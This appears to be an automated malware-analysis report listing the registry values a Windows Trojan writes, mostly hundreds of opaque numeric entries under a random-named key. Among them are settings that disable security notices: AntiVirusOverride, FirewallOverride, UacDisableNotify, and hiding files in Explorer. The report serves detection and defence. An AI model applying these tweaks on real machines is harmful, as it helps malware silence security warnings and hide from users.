The process %original file name%.exe:312 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Stvncyfrlda]
"m1_617" = "1053523142"
"m4_529" = "3140763709"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Stvncyfrlda]
"m4_528" = "1405472976"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Stvncyfrlda]
"m2_552" = "102784434"
"m2_553" = "1838064822"
"m2_550" = "927168274"
"m2_551" = "2662449825"
"m2_556" = "2748978344"
"m2_557" = "189292766"
"m2_554" = "3573364334"
"m2_555" = "1013679912"
"m2_558" = "1924581476"
"m2_559" = "3659879799"
"m4_446" = "845553638"
"m4_537" = "4138187685"
"m4_523" = "1318953903"
"m4_522" = "3878630466"
"m1_267" = "2128677322"
"m1_266" = "1358349657"
"m1_265" = "1238050202"
"m1_264" = "3405063513"
"m1_263" = "757867412"
"m1_262" = "3051025829"
"m1_261" = "2646895186"
"m1_260" = "2944550554"
"m3_447" = "2564285818"
"m1_269" = "4168470777"
"m1_268" = "4133363715"
"m4_0" = "0"
"m4_1" = "1735290733"
"m4_2" = "3470581466"
"m4_3" = "910904903"
"m4_4" = "2646195636"
"m4_5" = "86519073"
"m4_6" = "1821809806"
"m4_7" = "3557100539"
"m4_8" = "997423976"
"m1_312" = "50943663"
"m1_311" = "1840160101"
"m1_310" = "272374340"
"m1_317" = "1182715970"
"m1_316" = "2658376845"
"m1_315" = "3652391898"
"m1_314" = "2772468233"
"m2_426" = "499479046"
"m2_427" = "2234763705"
"m2_424" = "1323866543"
"m2_425" = "3059146303"
"m2_422" = "2148251340"
"m2_423" = "3883534449"
"m2_420" = "2972636365"
"m2_421" = "412951901"
"m3_442" = "2511276059"
"m2_428" = "3970064175"
"m2_429" = "1410376162"
"m4_445" = "3405230201"
"m4_610" = "1965392314"
"m4_442" = "2494325298"
"m3_261" = "1922363400"
"m3_260" = "220872861"
"m3_263" = "1131877074"
"m3_262" = "3657786279"
"m4_129" = "514205165"
"m4_128" = "3073881728"
"m3_267" = "3777846406"
"m3_266" = "2042408299"
"m4_125" = "2162976825"
"m4_124" = "427686092"
"m4_127" = "1338590995"
"m4_126" = "3898267558"
"m4_121" = "3811748485"
"m4_120" = "2076457752"
"m4_123" = "2987362655"
"m4_122" = "1252071922"
"m3_467" = "2943756798"
"m3_466" = "1174781507"
"m3_465" = "3734703828"
"m3_464" = "2032836537"
"m3_463" = "297331722"
"m3_462" = "2823715999"
"m3_461" = "1088277856"
"m3_460" = "3681770997"
"m4_443" = "4229616031"
"m4_534" = "3227282782"
"m3_469" = "2085701784"
"m3_468" = "350280045"
"m4_29" = "3078791001"
"m4_28" = "1343500268"
"m4_23" = "1256981195"
"m4_22" = "3816657758"
"m4_21" = "2081367025"
"m4_20" = "346076292"
"m4_27" = "3903176831"
"m4_26" = "2167886098"
"m4_25" = "432595365"
"m4_24" = "2992271928"
"m4_440" = "3318711128"
"m4_615" = "2051911387"
"m1_24" = "82204513"
"m1_25" = "2328427742"
"m1_26" = "4256928343"
"m1_27" = "3679195990"
"m1_20" = "1381358557"
"m1_21" = "3396045707"
"m1_22" = "2256183590"
"m1_23" = "1890513527"
"m1_28" = "408344971"
"m1_29" = "1792020860"
"m3_199" = "1742469010"
"m3_198" = "4268311655"
"m4_305" = "982696157"
"m4_304" = "3542372720"
"m4_307" = "158310327"
"m4_306" = "2717986890"
"m4_301" = "2631467817"
"m4_300" = "896177084"
"m4_303" = "1807081987"
"m4_302" = "71791254"
"m4_309" = "3628891793"
"m4_308" = "1893601060"
"m4_495" = "4270420931"
"m4_494" = "2535130198"
"m4_497" = "3446035101"
"m4_496" = "1710744368"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Stvncyfrlda]
"m4_490" = "4183901858"
"m4_493" = "799839465"
"m4_492" = "3359516028"
"m3_513" = "1162748740"
"m3_512" = "3722293289"
"m3_511" = "1953693882"
"m3_510" = "251826447"
"m4_499" = "2621649271"
"m4_498" = "886358538"
"m3_515" = "304693870"
"m3_514" = "2864239347"
"m4_279" = "3109777355"
"m4_278" = "1374486622"
"m4_271" = "2112353379"
"m4_270" = "377062646"
"m4_273" = "1287967549"
"m4_272" = "3847644112"
"m4_275" = "463581719"
"m4_274" = "3023258282"
"m4_277" = "3934163185"
"m4_276" = "2198872452"
"m3_3" = "927474798"
"m3_2" = "3487544563"
"m3_1" = "1718420804"
"m3_0" = "17001001"
"m3_7" = "3573965266"
"m3_6" = "1838544551"
"m3_5" = "69945096"
"m3_4" = "2629490589"
"m2_314" = "3715409322"
"m2_315" = "1155731386"
"m3_9" = "2749530364"
"m3_8" = "980422977"
"m2_310" = "1069218009"
"m2_311" = "2804501571"
"m2_312" = "244830792"
"m2_313" = "1980115641"

[HKCU\Software\Stvncyfrlda\168128873]
"1735290733" = "96"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Stvncyfrlda]
"m1_460" = "1266874793"
"m1_463" = "3037316856"
"m1_462" = "2343642055"
"m1_465" = "122565537"
"m1_464" = "2925759942"
"m1_467" = "2411080615"
"m1_466" = "3220234607"
"m1_469" = "2008561072"
"m1_468" = "541628957"
"m1_5" = "400461399"
"m1_4" = "899486414"
"m1_7" = "2089840013"
"m1_6" = "975944151"
"m1_1" = "2206277335"
"m1_0" = "332287070"
"m3_68" = "2018964189"
"m3_69" = "3787940424"
"m3_66" = "2877018163"
"m3_67" = "283394990"
"m3_64" = "3667439977"
"m3_65" = "1107894404"
"m3_62" = "230528591"
"m3_63" = "1965949434"
"m3_60" = "1021409189"
"m3_61" = "2756962000"
"m2_220" = "3806846472"
"m2_221" = "1247158805"
"m2_222" = "2982460362"
"m2_223" = "422778803"
"m2_224" = "2158061273"
"m2_225" = "3893359907"
"m2_226" = "1333675097"
"m2_227" = "3068974696"
"m2_228" = "509288593"
"m2_229" = "2244589702"
"m2_496" = "1710751212"
"m3_605" = "1862155952"
"m2_495" = "4270417636"
"m2_494" = "2535133606"
"m2_29" = "3078784956"
"m2_28" = "1343502649"
"m2_25" = "432601441"
"m2_24" = "2992267390"
"m2_27" = "3903183251"
"m2_26" = "2167895257"
"m2_21" = "2081370417"
"m2_20" = "346074746"
"m2_23" = "1256985182"
"m2_22" = "3816655352"
"m3_604" = "160272133"
"m2_169" = "1206361889"
"m2_168" = "3766029797"
"m2_163" = "3679513821"
"m2_162" = "1944229471"
"m2_161" = "208931501"
"m2_160" = "2768616047"
"m2_167" = "2030743464"
"m2_166" = "295456857"
"m2_165" = "2855125920"
"m2_164" = "1119845658"
"m3_438" = "4159819351"
"m3_439" = "1600289218"
"m3_436" = "689352589"
"m3_437" = "2391236408"
"m2_545" = "840641902"
"m2_544" = "3400325402"
"m2_547" = "16256273"
"m2_546" = "2575941397"
"m2_541" = "2489412717"
"m2_540" = "754127532"
"m2_543" = "1665027871"
"m2_542" = "4224712319"
"m2_549" = "3486836367"
"m2_548" = "1751555309"
"m1_258" = "1047106666"
"m1_259" = "3957904430"
"m1_252" = "3793832213"
"m1_253" = "1490415974"
"m1_250" = "3012752987"
"m1_251" = "429150645"
"m1_256" = "586137857"
"m1_257" = "2953586393"
"m1_254" = "2599298087"
"m1_255" = "1649977084"
"m1_328" = "583779169"
"m1_329" = "3516233759"
"m1_326" = "547154366"
"m1_327" = "3823432836"
"m1_324" = "506016810"
"m1_325" = "1785169166"
"m1_322" = "1229709930"
"m1_323" = "1819836157"
"m1_320" = "528487471"
"m1_321" = "4272220688"
"m2_439" = "1583422865"
"m2_438" = "4143100546"
"m2_431" = "585990157"
"m2_430" = "3145678564"
"m2_433" = "4056574439"
"m2_432" = "2321291594"
"m2_435" = "3232190442"
"m2_434" = "1496904181"
"m2_437" = "2407800886"
"m2_436" = "672518837"
"m1_319" = "4278564602"
"m3_214" = "2001882935"
"m3_215" = "3703373474"
"m3_216" = "1143826897"
"m3_217" = "2912885068"
"m3_210" = "3650358595"
"m3_211" = "1090960638"
"m3_212" = "2792828013"
"m3_213" = "266461080"
"m3_218" = "352946427"
"m3_219" = "2054830102"
"m3_328" = "2222827905"
"m3_329" = "3991820604"
"m3_458" = "177222443"
"m3_459" = "1912775238"
"m1_604" = "100579990"
"m3_320" = "1258824297"
"m3_321" = "2960842116"
"m3_322" = "434851123"
"m3_323" = "2169896110"
"m3_324" = "3871764445"
"m3_325" = "1311776584"
"m3_326" = "3080883943"
"m3_327" = "521354770"
"m4_38" = "1516538414"
"m4_39" = "3251829147"
"m1_606" = "1330996085"
"m4_9" = "2732714709"
"m4_30" = "519114438"
"m4_31" = "2254405171"
"m4_32" = "3989695904"
"m4_33" = "1430019341"
"m4_34" = "3165310074"
"m4_35" = "605633511"
"m4_36" = "2340924244"
"m4_37" = "4076214977"
"m4_598" = "2616739998"
"m4_530" = "581087146"
"m1_603" = "3548659460"
"m4_599" = "57063435"
"m1_602" = "4209119315"
"m1_11" = "1033625118"
"m1_10" = "1344860173"
"m1_13" = "4157785309"
"m1_12" = "186318157"
"m1_15" = "1023315544"
"m1_14" = "3996098252"
"m1_17" = "3833016195"
"m1_16" = "2633266203"
"m1_19" = "358018413"
"m1_18" = "493538257"
"m4_468" = "367244100"
"m4_469" = "2102534833"
"m3_528" = "1388755705"
"m3_529" = "3124177428"
"m4_460" = "3664787420"
"m4_461" = "1105110857"
"m4_462" = "2840401590"
"m4_463" = "280725027"
"m4_464" = "2016015760"
"m4_465" = "3751306493"
"m4_466" = "1191629930"
"m4_467" = "2926920663"
"m4_593" = "2530220925"
"m4_596" = "3441125828"
"m4_607" = "1054487411"
"m4_597" = "881449265"
"m4_608" = "2789778144"
"m4_609" = "230101581"
"m3_140" = "2439480757"
"m3_141" = "4140840224"
"m3_142" = "1581425759"
"m3_143" = "3350419402"
"m4_208" = "163219600"
"m4_209" = "1898510333"
"m3_146" = "4260947459"
"m3_147" = "1701482942"
"m4_204" = "1811991260"
"m4_205" = "3547281993"
"m4_206" = "987605430"
"m4_207" = "2722896163"
"m4_200" = "3460762920"
"m4_201" = "901086357"
"m4_202" = "2636377090"
"m4_203" = "76700527"
"m3_155" = "2665356502"
"m2_309" = "3628885234"
"m2_308" = "1893608174"
"m2_307" = "158302672"
"m2_306" = "2717983244"
"m2_305" = "982704089"
"m2_304" = "3542370050"
"m2_303" = "1807087593"
"m2_302" = "71789561"
"m2_301" = "2631473444"
"m2_300" = "896172138"
"m3_159" = "1016356506"
"m1_414" = "2795817973"
"m1_415" = "3374799353"
"m1_416" = "3390962981"
"m3_158" = "3609964399"
"m1_410" = "3510595105"
"m1_411" = "3284944894"
"m1_412" = "928340701"
"m1_413" = "1972203224"
"m1_418" = "877886607"
"m1_419" = "3179921219"
"m4_510" = "235010854"
"m4_511" = "1970301587"
"m3_19" = "2888904510"
"m3_18" = "1153482627"
"m4_514" = "2881206490"
"m4_515" = "321529927"
"m4_516" = "2056820660"
"m4_517" = "3792111393"
"m3_13" = "1100530336"
"m3_12" = "3626914613"
"m3_11" = "1891476358"
"m3_10" = "190001259"
"m3_17" = "3746958356"
"m3_16" = "2011536633"
"m3_15" = "243002698"
"m3_14" = "2835971551"
"m2_233" = "595817777"
"m2_232" = "3155485612"
"m2_231" = "1420202531"
"m2_230" = "3979870930"
"m2_237" = "3242014297"
"m2_236" = "1506716866"
"m2_235" = "4066402227"
"m2_234" = "2331103109"
"m2_239" = "2417627973"
"m2_238" = "682341020"
"m2_38" = "1516541930"
"m2_39" = "3251822662"
"m2_32" = "3989696872"
"m2_33" = "1430013785"
"m2_30" = "519117793"
"m2_31" = "2254398801"
"m2_36" = "2340925524"
"m2_37" = "4076208955"
"m2_34" = "3165311362"
"m2_35" = "605629119"
"m1_528" = "1767794799"
"m1_529" = "2994147206"
"m1_520" = "2251380949"
"m1_521" = "1978517788"
"m1_522" = "2497079608"
"m1_523" = "2767792857"
"m1_524" = "2952287850"
"m1_525" = "3344047930"
"m1_526" = "2289429325"
"m1_527" = "1275600600"
"m1_638" = "72680825"
"m1_639" = "4074920261"
"m2_158" = "3592999163"
"m2_159" = "1033317936"
"m2_156" = "122420357"
"m2_157" = "1857702857"
"m2_154" = "946806257"
"m2_155" = "2682088805"
"m2_152" = "1771191849"
"m2_153" = "3506474380"
"m2_150" = "2595573796"
"m2_151" = "35887433"
"m3_556" = "2732157589"
"m3_445" = "3421821520"
"m3_349" = "9342384"
"m1_249" = "2783128759"
"m1_248" = "3834691107"
"m1_245" = "89977372"
"m1_244" = "243941803"
"m1_247" = "153791120"
"m1_246" = "2202647403"
"m1_241" = "481014566"
"m1_240" = "1992163142"
"m1_243" = "2565102020"
"m1_242" = "3797638779"
"m3_269" = "2919792544"
"m2_448" = "21162605"
"m2_449" = "1756461333"
"m3_268" = "1184877621"
"m2_444" = "1669944348"
"m2_445" = "3405228082"
"m2_446" = "845549247"
"m2_447" = "2580845831"
"m2_440" = "3318716731"
"m2_441" = "759032183"
"m2_442" = "2494329222"
"m2_443" = "4229611541"
"m4_503" = "972877611"
"m4_502" = "3532554174"
"m4_501" = "1797263441"
"m1_331" = "886593873"
"m1_330" = "1204511731"
"m1_333" = "2269344119"
"m1_332" = "45758738"
"m1_335" = "1657253037"
"m1_334" = "299235905"
"m1_337" = "2090049728"
"m1_336" = "1223566946"
"m1_339" = "516636905"
"m1_338" = "3006685628"
"m4_506" = "1883782514"
"m4_505" = "148491781"
"m4_504" = "2708168344"
"m3_207" = "2739893002"
"m3_206" = "1004454815"
"m3_205" = "3530313824"
"m3_204" = "1828954357"
"m3_203" = "93401414"
"m3_202" = "2619377195"
"m3_201" = "884348604"
"m3_200" = "3477366529"
"m4_509" = "2794687417"
"m3_209" = "1881906644"
"m3_208" = "146399929"
"m3_339" = "4131317630"
"m3_338" = "2395764675"
"m3_449" = "1773274116"
"m3_448" = "4297961"
"m3_333" = "2342886112"
"m3_332" = "574352245"
"m3_331" = "3133766598"
"m3_330" = "1431881899"
"m3_337" = "694404180"
"m3_336" = "3253818681"
"m3_335" = "1484825994"
"m3_334" = "4078307871"
"m4_402" = "1802172714"
"m4_403" = "3537463447"
"m4_400" = "2626558544"
"m4_401" = "66881981"
"m4_406" = "153401054"
"m4_407" = "1888691787"
"m4_404" = "977786884"
"m4_405" = "2713077617"
"m3_531" = "2333242686"
"m3_530" = "597804419"
"m3_533" = "1508808664"
"m3_532" = "4034716845"
"m3_535" = "650753762"
"m3_534" = "3244230519"
"m3_537" = "4154773900"
"m3_536" = "2386175505"
"m3_539" = "3297243222"
"m3_538" = "1595228475"
"m4_479" = "2275572979"
"m4_478" = "540282246"
"m4_473" = "453763173"
"m4_472" = "3013439736"
"m4_471" = "1278149003"
"m4_470" = "3837825566"
"m4_477" = "3099958809"
"m4_476" = "1364668076"
"m4_475" = "3924344639"
"m4_474" = "2189053906"
"m4_606" = "3614163974"
"m3_407" = "1905282146"
"m3_291" = "2475410126"
"m3_153" = "3489919500"
"m3_152" = "1754350225"
"m3_151" = "52482914"
"m3_150" = "2612405239"
"m3_157" = "1874411504"
"m3_156" = "105417797"
"m4_219" = "2071548479"
"m3_154" = "963407291"
"m4_217" = "2895934309"
"m4_216" = "1160643576"
"m4_215" = "3720320139"
"m4_214" = "1985029406"
"m4_213" = "249738673"
"m4_212" = "2809415236"
"m4_211" = "1074124503"
"m4_210" = "3633801066"
"m4_563" = "2011106487"
"m3_409" = "1047752460"
"m1_407" = "2780381759"
"m1_406" = "3496077677"
"m1_405" = "1542645872"
"m1_404" = "349641579"
"m1_403" = "2491754946"
"m1_402" = "1709543005"
"m1_401" = "410778246"
"m1_400" = "1415041777"
"m1_409" = "3869334346"
"m1_408" = "3633528258"
"m2_332" = "590910485"
"m2_333" = "2326195666"
"m2_330" = "1415297816"
"m2_331" = "3150578331"
"m2_336" = "3237095916"
"m2_337" = "677425443"
"m2_334" = "4061492808"
"m2_335" = "1501813380"
"m2_338" = "2412708948"
"m2_339" = "4148009576"
"m2_206" = "987609805"
"m2_207" = "2722892295"
"m2_204" = "1811996275"
"m2_205" = "3547278434"
"m2_202" = "2636380453"
"m2_203" = "76693878"
"m2_200" = "3460766828"
"m2_201" = "901082009"
"m2_208" = "163224893"
"m2_209" = "1898505745"
"m3_197" = "2532889800"
"m3_196" = "831399261"
"m3_195" = "3357379118"

"m1_539" = "2219814082"
"m3_194" = "1622350515"
"m1_533" = "2670146639"
"m3_193" = "4215368452"
"m1_531" = "955937759"
"m1_530" = "17732635"
"m1_537" = "2605020955"
"m1_536" = "2113390182"
"m1_535" = "3021309809"
"m3_192" = "2479946729"
"m2_475" = "3924339512"
"m3_191" = "711346298"
"m1_629" = "2567794599"
"m2_474" = "2189057276"
"m1_627" = "2793341995"
"m1_626" = "1874045951"
"m1_625" = "154990701"
"m3_190" = "3270891727"
"m1_623" = "2184442409"
"m1_622" = "2699118757"
"m1_621" = "2626092622"
"m1_620" = "3739834425"
"m2_141" = "4157817947"
"m2_140" = "2422535851"
"m2_143" = "3333432760"
"m2_142" = "1598151312"
"m2_145" = "2509047700"
"m2_144" = "773764159"
"m2_147" = "1684663560"
"m2_146" = "4244347814"
"m2_149" = "860277965"
"m2_148" = "3419959532"
"m2_479" = "2275567315"
"m2_478" = "540285921"
"m1_532" = "2037745729"
"m1_534" = "461785975"
"m3_643" = "3412243694"
"m1_628" = "2257531934"
"m3_519" = "2984284114"
"m3_518" = "1215700135"
"m4_491" = "1624225295"
"m1_182" = "2748774479"
"m1_183" = "3453789424"
"m1_180" = "616578014"
"m1_181" = "996807637"
"m1_186" = "1957930111"
"m1_187" = "2298916277"
"m1_184" = "3766606054"
"m1_185" = "2104512924"
"m1_188" = "1853360062"
"m1_189" = "106042406"
"m2_459" = "1929502427"
"m2_458" = "194199775"
"m2_457" = "2753885435"
"m2_456" = "1018590414"
"m2_455" = "3578271205"
"m2_454" = "1842973114"
"m2_453" = "107690774"
"m2_452" = "2667355176"
"m2_451" = "932073901"
"m2_450" = "3491741982"
"m3_517" = "3808718088"
"m3_516" = "2073820573"
"m1_344" = "4031224913"
"m1_345" = "4261669520"
"m1_346" = "1845180925"
"m1_347" = "1495798530"
"m1_340" = "4107917070"
"m1_341" = "3994901791"
"m1_342" = "3100927528"
"m1_343" = "1374383541"
"m1_348" = "1383808088"
"m1_349" = "3211190306"
"m1_296" = "32700597"
"m1_297" = "2748245620"
"m1_294" = "2278797121"
"m1_295" = "515747364"
"m1_292" = "3985841999"
"m1_293" = "2634536054"
"m1_290" = "810759105"
"m1_291" = "3243511153"
"m3_232" = "3172438241"
"m3_233" = "578813980"
"m3_230" = "3963318727"
"m3_231" = "1436934514"
"m3_236" = "1489883733"
"m3_237" = "3225308608"
"m1_298" = "3130476118"
"m1_299" = "1659204371"
"m3_308" = "1910334733"
"m3_309" = "3645838520"
"m3_306" = "2734840419"
"m3_307" = "141358494"
"m3_304" = "3525786457"
"m3_305" = "999402228"
"m3_302" = "88348863"
"m3_303" = "1790347306"
"m3_300" = "879360405"
"m3_301" = "2648336640"
"m4_12" = "3643619612"
"m4_13" = "1083943049"
"m4_10" = "173038146"
"m4_11" = "1908328879"
"m4_16" = "1994847952"
"m4_17" = "3730138685"
"m4_14" = "2819233782"
"m4_15" = "259557219"
"m4_18" = "1170462122"
"m4_19" = "2905752855"
"m4_447" = "2580844371"
"m3_544" = "3417288073"
"m3_545" = "857234724"
"m3_546" = "2559233107"
"m3_547" = "33259470"
"m3_540" = "770728901"
"m3_541" = "2506232688"
"m3_542" = "4207706863"
"m3_543" = "1648177690"
"m3_548" = "1768288125"
"m3_549" = "3470237416"
"m4_198" = "4285148750"
"m4_199" = "1725472187"
"m4_448" = "21167808"
"m4_449" = "1756458541"
"m4_194" = "1638953114"
"m4_195" = "3374243847"
"m4_196" = "814567284"
"m4_197" = "2549858017"
"m4_190" = "3287724774"
"m4_191" = "728048211"
"m4_192" = "2463338944"
"m4_193" = "4198629677"
"m3_496" = "1693747481"
"m3_497" = "3429185716"
"m3_494" = "2518183551"
"m3_495" = "4287240682"
"m3_492" = "3376238421"
"m3_493" = "783285952"
"m3_490" = "4167183499"
"m3_491" = "1640815654"
"m3_498" = "903325731"
"m3_499" = "2638240606"
"m4_222" = "2982453382"
"m4_223" = "422776819"
"m1_79" = "1913234704"
"m1_78" = "4118415213"
"m4_226" = "1333681722"
"m4_227" = "3068972455"
"m4_224" = "2158067552"
"m4_225" = "3893358285"
"m1_73" = "1982944427"
"m1_72" = "4180144338"
"m1_71" = "2005941269"
"m1_70" = "503825556"
"m1_77" = "3267195005"
"m1_76" = "3320388867"
"m1_75" = "1263983444"
"m1_74" = "3775077689"
"m3_166" = "278866567"
"m3_167" = "2013911602"
"m3_164" = "1136397309"
"m3_165" = "2871966568"
"m3_162" = "1927407827"
"m3_163" = "3662911566"
"m3_160" = "2751909385"
"m3_161" = "225933732"
"m3_168" = "3782899105"
"m3_169" = "1189405916"
"m3_641" = "4203189700"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Stvncyfrlda]
"m4_444" = "1669939468"
"m1_438" = "2315978367"
"m1_439" = "2225657903"
"m1_432" = "3551539276"
"m1_433" = "3612631014"
"m1_430" = "2789880429"
"m1_431" = "2369905663"
"m1_436" = "530284453"
"m1_437" = "3453828564"
"m1_434" = "2839951551"
"m1_435" = "2625405315"
"m3_35" = "622481870"
"m3_34" = "3182011987"
"m3_37" = "4092948712"
"m3_36" = "2323956093"
"m3_31" = "2270958618"
"m3_30" = "535979247"
"m3_33" = "1413429028"
"m3_32" = "3972958089"
"m3_39" = "3234960306"
"m3_38" = "1533534215"
"m4_538" = "1578511122"
"m4_539" = "3313801855"
"m2_219" = "2071544553"
"m2_218" = "336262027"
"m2_211" = "1074118817"
"m2_210" = "3633803533"
"m2_213" = "249735947"
"m2_212" = "2809420030"
"m2_215" = "3720315361"
"m2_214" = "1985033364"
"m2_217" = "2895930442"
"m2_216" = "1160647470"
"m3_636" = "4150245605"
"m3_637" = "1556621328"
"m3_634" = "645700059"
"m3_635" = "2414676342"
"m1_508" = "654102370"
"m1_509" = "185768158"
"m1_506" = "200630984"
"m1_507" = "618373824"
"m1_504" = "2109669623"
"m1_505" = "1002055091"
"m1_502" = "3149251936"
"m1_503" = "3499407923"
"m1_500" = "4080341079"
"m1_501" = "2522258912"
"m3_630" = "2294635543"
"m3_631" = "4030189442"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Stvncyfrlda]
"m2_134" = "600722970"
"m2_135" = "2336020347"
"m2_136" = "4071303536"
"m2_137" = "1511636373"
"m2_130" = "2249493472"
"m2_131" = "3984791373"
"m2_132" = "1425105309"
"m2_133" = "3160405037"
"m1_618" = "316096425"
"m1_619" = "2690853336"
"m2_138" = "3246915604"
"m2_139" = "687247672"
"m2_318" = "2066643963"
"m2_319" = "3801923760"
"m2_316" = "2891029696"
"m2_317" = "331345419"
"m2_598" = "2616744826"
"m2_599" = "57063239"
"m2_596" = "3441128384"
"m2_597" = "881445490"
"m2_594" = "4265516985"
"m2_595" = "1705828793"
"m2_592" = "794932259"
"m2_593" = "2530216593"
"m2_590" = "1619317059"
"m2_591" = "3354603349"
"m1_195" = "1980927161"
"m1_194" = "821663117"
"m1_197" = "2586557690"
"m1_196" = "4121135620"
"m1_191" = "2666963066"
"m1_190" = "788902834"
"m1_193" = "3821883762"
"m1_192" = "3713684974"
"m2_468" = "367240176"
"m2_469" = "2102539581"
"m1_199" = "3890929863"
"m1_198" = "1001532501"
"m1_357" = "2384757589"
"m1_356" = "3921153804"
"m1_355" = "1141364893"
"m1_354" = "2853569671"
"m1_353" = "3768368376"
"m1_352" = "1191078490"
"m1_351" = "1611402247"
"m1_350" = "1510943824"
"m1_359" = "1540493462"
"m1_358" = "110393856"
"m1_461" = "3493105467"
"m1_289" = "2116733206"
"m1_288" = "4285035474"
"m3_229" = "2227881640"
"m3_228" = "525883197"
"m1_281" = "2023017824"
"m1_280" = "22339581"
"m3_227" = "3085936526"
"m3_226" = "1316828179"
"m1_285" = "2150754031"
"m1_284" = "1540255391"
"m3_223" = "405824986"
"m3_222" = "2965883567"
"m1_380" = "944743495"
"m3_520" = "424755009"
"m1_381" = "3742644810"
"m1_382" = "608581789"
"m1_383" = "1937530528"
"m1_384" = "2451639613"
"m1_385" = "1978774364"
"m1_386" = "1201472671"
"m1_387" = "1812145423"
"m3_311" = "2787784514"
"m3_310" = "1052346327"
"m3_313" = "1996838508"
"m3_312" = "261400305"
"m3_315" = "1172336950"
"m3_314" = "3698835867"
"m3_317" = "314348496"
"m3_316" = "2907889829"
"m3_319" = "3818894074"
"m3_318" = "2049770319"
"m4_451" = "932072711"
"m2_255" = "117501284"
"m4_453" = "107686881"
"m4_452" = "2667363444"
"m4_455" = "3578268347"
"m4_454" = "1842977614"
"m4_457" = "2753882517"
"m2_254" = "2677184168"
"m4_459" = "1929496687"
"m4_458" = "194205954"
"m3_559" = "3676710186"
"m3_558" = "1941288383"
"m4_189" = "1552434041"
"m4_188" = "4112110604"
"m4_187" = "2376819871"
"m4_186" = "641529138"
"m4_185" = "3201205701"
"m4_184" = "1465914968"
"m4_183" = "4025591531"
"m4_182" = "2290300798"
"m4_181" = "555010065"
"m4_180" = "3114686628"
"m3_489" = "2431761692"
"m3_401" = "50324372"
"m1_3" = "2582403220"
"m3_400" = "2643292281"
"m3_481" = "1467757028"
"m3_480" = "3994256969"
"m3_483" = "610226318"
"m1_2" = "4033193091"
"m3_485" = "4114248616"
"m3_403" = "3554280126"
"m3_487" = "3256259186"
"m3_486" = "1520755399"
"m3_402" = "1785303811"
"m3_405" = "2696228184"
"m3_404" = "994357805"
"m1_68" = "1769901637"
"m1_69" = "2567323868"
"m4_237" = "3242010601"
"m4_236" = "1506719868"
"m4_231" = "1420200795"
"m4_230" = "3979877358"
"m4_233" = "595814965"
"m4_232" = "3155491528"
"m1_60" = "3204659430"
"m2_259" = "2763697419"
"m1_62" = "717154010"
"m1_63" = "3357743023"
"m1_64" = "2418231550"
"m1_65" = "1556493841"
"m1_66" = "2534914724"
"m1_67" = "525926733"
"m3_179" = "1395950366"
"m3_178" = "3955889123"
"m3_408" = "3640852369"
"m3_171" = "398919654"
"m3_170" = "2924909643"
"m3_173" = "3835831936"
"m3_172" = "2133964565"
"m3_175" = "3044884906"
"m3_174" = "1275909695"
"m3_177" = "2186829940"
"m3_176" = "451932377"
"m3_566" = "2938712279"
"m3_567" = "345743426"
"m1_429" = "4065109702"
"m1_428" = "4150340323"
"m1_425" = "647889562"
"m1_424" = "83707901"
"m1_427" = "3289792235"
"m1_426" = "2417347347"
"m1_421" = "697669691"
"m1_420" = "1035417531"
"m1_423" = "1888118349"
"m1_422" = "512782961"
"m3_22" = "3799972215"
"m3_23" = "1273981154"
"m3_20" = "363060909"
"m3_21" = "2097957336"
"m3_26" = "2150906683"
"m3_27" = "3920013910"
"m3_24" = "3008960529"
"m3_25" = "415992716"
"m4_521" = "2143339733"
"m4_520" = "408049000"
"m3_28" = "1360479685"
"m3_29" = "3061970288"
"m4_525" = "494568073"
"m4_524" = "3054244636"
"m4_527" = "3965149539"
"m4_526" = "2229858806"
"m2_268" = "1201451835"
"m2_269" = "2936735283"
"m2_264" = "2850225944"
"m2_265" = "290540669"
"m2_266" = "2025838886"
"m2_267" = "3761120011"
"m2_260" = "204029132"
"m2_261" = "1939308893"
"m2_262" = "3674608690"
"m2_263" = "1114925371"
"m1_511" = "313969637"
"m1_510" = "75685972"
"m1_513" = "2745450716"
"m1_512" = "4056296295"
"m1_515" = "3747584253"
"m1_514" = "4086806112"
"m1_517" = "53407030"
"m1_516" = "814228893"
"m1_519" = "47326276"
"m1_518" = "3885210427"
"m2_493" = "799835656"
"m2_492" = "3359519206"
"m2_127" = "1338594519"
"m2_126" = "3898262281"
"m2_125" = "2162979700"
"m2_124" = "427679896"
"m2_123" = "2987365503"
"m2_122" = "1252068270"
"m2_121" = "3811752952"
"m2_120" = "2076453871"
"m1_609" = "3861078015"
"m1_608" = "2558906543"
"m2_129" = "514209481"
"m2_128" = "3073876092"

[HKCU\Software\Stvncyfrlda\168128873]
"-824385830" = "0"

[HKCU\Software\Stvncyfrlda]
"m4_441" = "759034565"
"m2_490" = "4183907872"
"m2_497" = "3446033159"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Stvncyfrlda]
"m2_581" = "3181572278"
"m2_580" = "1446275082"
"m2_583" = "2357191921"
"m2_582" = "621891546"
"m2_585" = "1532801327"
"m2_584" = "4092473246"
"m2_587" = "708406808"
"m2_586" = "3268088366"
"m2_589" = "4178986973"
"m2_588" = "2443704018"
"m1_168" = "2508033078"
"m1_169" = "1364320184"
"m2_477" = "3099952167"
"m2_476" = "1364669932"
"m2_471" = "1278154419"
"m2_470" = "3837822241"
"m2_473" = "453767657"
"m2_472" = "3013438092"
"m1_160" = "1392554902"
"m1_161" = "1964895812"
"m1_162" = "2731405735"
"m1_163" = "2574901212"
"m1_164" = "137714799"
"m1_165" = "1936220912"
"m1_166" = "476672531"
"m1_167" = "4141290893"
"m1_368" = "1111723201"
"m1_369" = "1450958252"
"m1_362" = "2877716632"
"m1_363" = "1524324857"
"m1_360" = "24689657"
"m1_361" = "4271466763"
"m1_366" = "4109813607"
"m1_367" = "1329282301"
"m1_364" = "775489076"
